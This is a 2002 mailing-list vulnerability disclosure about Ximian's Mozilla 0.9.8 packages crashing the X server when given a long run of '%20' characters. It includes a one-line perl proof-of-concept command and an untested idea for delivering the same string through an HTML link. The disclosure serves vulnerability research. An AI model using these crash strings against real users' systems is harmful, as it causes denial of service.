Vulnerability Development mailing list archives

Ximian Mozilla: The 2618 Bug


From: "Replugge [Rod]" <replugge () alcoholico org>
Date: 17 Feb 2002 17:24:28 +0100

NOTE TO THE MODERATOR: This was sent yesterday but I guess didn't
make it since this doesn't seem to affect Red Hat itself, it affects
the mozilla packages distributed by Ximian:

The test system looks like:

bash#~ rpm -qa | grep mozilla
mozilla-0.9.8-1.ximian.2
mozilla-mail-0.9.8-1.ximian.2
mozilla-xmlterm-0.9.8-1.ximian.2
mozilla-devel-0.9.8-1.ximian.2
nautilus-mozilla-1.0.6-ximian.4
mozilla-psm-0.9.8-1.ximian.2
kdebindings-kmozilla-2.1.1-1

This was tested in both RH7.1 and 7.2 with Ximian Gnome (with all the
updates).


There is a bug in mozilla 0.9.8-1 which allows you
to crash the X server.

I won't go into details; I'll just show the proof
of concept.


exploit:

Local:
bash#~ mozilla `perl -e "print '%20' x 2618"`


Remote:
I haven't tested this but I guess:

echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >> ./attack.html

perhaps using "img src" or JavaScript...


Best Regards

-- 
/* 
Rodrigo Gutierrez                   <rodrigo () trustix com>
Trustix AS                         http://www.trustix.com 
*/

